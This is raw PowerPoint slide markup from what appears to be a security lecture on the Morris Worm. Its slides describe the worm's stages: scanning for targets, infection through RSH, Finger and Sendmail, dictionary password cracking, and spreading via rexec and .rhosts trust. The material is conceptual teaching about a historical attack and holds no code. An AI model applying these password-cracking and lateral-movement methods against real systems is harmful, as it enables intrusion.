              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using an internal dictionary (432 words)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the UNIX online dictionary </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Gruppieren 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9536578" y="66468"/>
            <a:ext cx="2489521" cy="934933"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="9544735" cy="3808540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Grafik 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Grafik 30"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7886594" y="2332213"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Grafik 31"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8751919" y="2593800"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Grafik 32"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7881854" y="3450858"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Grafik 33"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8853581" y="3681736"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="Gruppieren 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="318444" y="1887083"/>
              <a:ext cx="2841445" cy="2118378"/>
              <a:chOff x="318444" y="1887083"/>
              <a:chExt cx="2841445" cy="2118378"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Textfeld 49"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="318444" y="3253207"/>
                <a:ext cx="2488555" cy="752254"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rechteck 50"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1426352" y="1887083"/>
                <a:ext cx="1733537"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List of Target Machines</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Host A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="52" name="Verbinder: gewinkelt 51"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="51" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="709388" y="2536244"/>
                <a:ext cx="960139" cy="473789"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">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6" name="Gruppieren 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159889" y="1943546"/>
              <a:ext cx="4636275" cy="1346876"/>
              <a:chOff x="3159889" y="1943546"/>
              <a:chExt cx="4636275" cy="1346876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="46" name="Gruppieren 45"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1943546"/>
                <a:ext cx="3182464" cy="1346876"/>
                <a:chOff x="4476250" y="1573153"/>
                <a:chExt cx="3182464" cy="1346876"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Textfeld 47"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560254" y="1573153"/>
                  <a:ext cx="3071495" cy="752254"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="400" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Pfeil: nach rechts 48"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="27779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
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="47" name="Gerade Verbindung mit Pfeil 46"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="51" idx="3"/>
                <a:endCxn id="48" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159889" y="2293068"/>
                <a:ext cx="1537817" cy="26605"/>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7" name="Gruppieren 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2175962"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2175962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="38" name="Gruppieren 37"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1003006"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1003006"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Textfeld 41"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1003006"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="400" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="43" name="Gruppieren 42"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="44" name="Pfeil: nach oben gekrümmt 43"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="45" name="Pfeil: nach oben gekrümmt 44"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Pfeil: nach rechts 38"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="27779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
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rechteck 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284257" y="4832782"/>
                <a:ext cx="1983674"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="41" name="Gerade Verbindung mit Pfeil 40"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="42" idx="3"/>
                <a:endCxn id="40" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790600" y="5194122"/>
                <a:ext cx="493658" cy="44647"/>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55740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Morris Worm: 5 State Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Once a password is broken (“Infinite State 5”):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Break into remote machines where that user had accounts: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan files: .forward and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote shell by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> remote command execution service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Authentication with username/password is possible, because users often have the same </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>	password on their accounts on multiple machines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use local authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to local host (authentication with local username/pw) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RSH to the remote machine (authentication with username)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Success if remote machine had a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> file or the user had a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> file that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>	allow remote execution without password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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18</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Gruppieren 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9536578" y="66468"/>
            <a:ext cx="2489521" cy="934933"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="9544735" cy="3808540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Grafik 20"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Grafik 21"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7886594" y="2332213"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Grafik 22"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8751919" y="2593800"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Grafik 23"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7881854" y="3450858"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Grafik 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8853581" y="3681736"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Gruppieren 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="318444" y="1887083"/>
              <a:ext cx="2841445" cy="2118378"/>
              <a:chOff x="318444" y="1887083"/>
              <a:chExt cx="2841445" cy="2118378"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Textfeld 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="318444" y="3253207"/>
                <a:ext cx="2488555" cy="752254"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Rechteck 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1426352" y="1887083"/>
                <a:ext cx="1733537"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List of Target Machines</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Host A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
